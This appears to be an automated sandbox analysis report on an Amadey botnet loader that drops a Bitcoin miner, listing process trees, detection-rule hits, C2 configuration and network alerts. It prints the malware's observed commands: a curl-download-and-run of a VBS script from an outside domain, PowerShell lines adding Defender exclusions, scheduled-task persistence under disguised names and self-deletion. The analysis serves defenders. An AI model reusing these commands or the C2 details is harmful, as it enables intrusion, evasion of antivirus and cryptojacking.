    • cmd.exe (PID: 7620 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7820 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3052 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8176 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2944 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 344 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2756 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3244 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 416 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7404 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • services64.exe (PID: 6264 cmdline: C:\Windows\system32\services64.exe MD5: 651396CF297F15A1F92EE0A29E27C4EA)
    • cmd.exe (PID: 928 cmdline: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5720 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6640 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4304 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7368 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 1628 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost64.exe (PID: 7732 cmdline: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe" MD5: A8638A5105C9A663B0D6918D64B3AD21)
        • cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 4420 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • sihost64.exe (PID: 7844 cmdline: "C:\Windows\system32\Microsoft\Libs\sihost64.exe" MD5: 7112FD4E6B2CDD13C11B8B04A96769CB)
        • cmd.exe (PID: 8180 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • choice.exe (PID: 2720 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\svchost64.exe | JoeSecurity_bitcoinminer | Yara detected BitCoin Miner | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
(13 entries in total; table truncated)

Source | Rule | Description | Author | Strings
85.2.miner2.0.exe.347b538.1.unpack | JoeSecurity_bitcoinminer | Yara detected BitCoin Miner | Joe Security |
122.2.services64.exe.3434b28.1.unpack | JoeSecurity_bitcoinminer | Yara detected BitCoin Miner | Joe Security |
122.2.services64.exe.3434b28.1.raw.unpack | JoeSecurity_bitcoinminer | Yara detected BitCoin Miner | Joe Security |
122.2.services64.exe.3421e28.2.unpack | JoeSecurity_bitcoinminer | Yara detected BitCoin Miner | Joe Security |
122.2.services64.exe.342b490.0.raw.unpack | JoeSecurity_bitcoinminer | Yara detected BitCoin Miner | Joe Security |
(12 entries in total; table truncated)

                        System Summary

                        Source: Process startedAuthor: Sreeman, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe, ParentProcessId: 1748, ParentProcessName: loader_5879465914.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, ProcessId: 4408, ProcessName: cmd.exe
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe", ParentImage: C:\Users\user\AppData\Local\Temp\svchost64.exe, ParentProcessId: 5992, ParentProcessName: svchost64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, ProcessId: 7224, ProcessName: cmd.exe
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe", ParentImage: C:\Users\user\AppData\Local\Temp\svchost64.exe, ParentProcessId: 5992, ParentProcessName: svchost64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, ProcessId: 7224, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, CommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: miner2.0.exe, ParentImage: C:\Users\user\AppData\Local\Temp\miner2.0.exe, ParentProcessId: 5868, ParentProcessName: miner2.0.exe, ProcessCommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, ProcessId: 8080, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8080, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 8116, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, CommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: miner2.0.exe, ParentImage: C:\Users\user\AppData\Local\Temp\miner2.0.exe, ParentProcessId: 5868, ParentProcessName: miner2.0.exe, ProcessCommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, ProcessId: 8080, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: cscript conf.vbs, ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 7692, ParentProcessName: cscript.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f, ProcessId: 7580, ProcessName: schtasks.exe
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe, ParentProcessId: 1748, ParentProcessName: loader_5879465914.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, ProcessId: 4408, ProcessName: cmd.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: cscript conf.vbs, CommandLine: cscript conf.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4408, ParentProcessName: cmd.exe, ProcessCommandLine: cscript conf.vbs, ProcessId: 7692, ProcessName: cscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8080, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 4496, ProcessName: powershell.exe
                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-09-27T17:42:05.763405+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 185.215.113.16 | 80 | TCP
                        2024-09-27T17:42:03.185010+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 185.215.113.16 | 80 | TCP
                        2024-09-27T17:42:03.422402+0200 | 2856122 | 1 | A Network Trojan was detected | 185.215.113.16 | 80 | 192.168.2.4 | 49737 | TCP
                        2024-09-27T17:42:03.636291+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 185.215.113.16 | 80 | TCP

                        AV Detection

                        Source: file.exeAvira: detected
                        Source: http://185.215.113.16/Jo89Ku7d/index.phpURL Reputation: Label: phishing
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeReversingLabs: Detection: 50%
                        Source: file.exeReversingLabs: Detection: 50%
                        Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJoe Sandbox ML: detected
                        Source: file.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00402559 CryptBinaryToStringA,malloc,CryptBinaryToStringA,7_2_00402559
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00402607 CryptStringToBinaryA,malloc,CryptStringToBinaryA,free,7_2_00402607

                        Bitcoin Miner

                        Source: Yara matchFile source: 85.2.miner2.0.exe.347b538.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.3434b28.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.3434b28.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.3421e28.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.342b490.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.3484bd0.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.342b490.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.347b538.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.3471ed0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.3421e28.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.3484bd0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 107.0.svchost64.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.3471ed0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000006B.00000000.2677511483.0000000000012000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000055.00000002.2682783373.000000000345A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000007A.00000002.2763019419.000000000340A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: miner2.0.exe PID: 5868, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 5992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: services64.exe PID: 6976, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 6772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 7732, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost64.exe, type: DROPPED
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 6772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 7732, type: MEMORYSTR
                        Source: svchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: I/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zipp
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49743 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49745 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49747 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49748 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49750 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49751 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49754 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49755 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49757 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49758 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49760 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49761 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49764 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49763 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49767 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49768 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49770 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49771 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49773 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49774 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49776 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49777 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49779 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49780 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49783 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49786 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49785 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49788 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49789 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49793 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49792 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49795 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49796 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49800 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49801 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49803 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49804 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49806 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49807 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49810 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49811 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49813 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49815 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49816 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49818 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49820 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49822 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49825 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49828 version: TLS 1.2
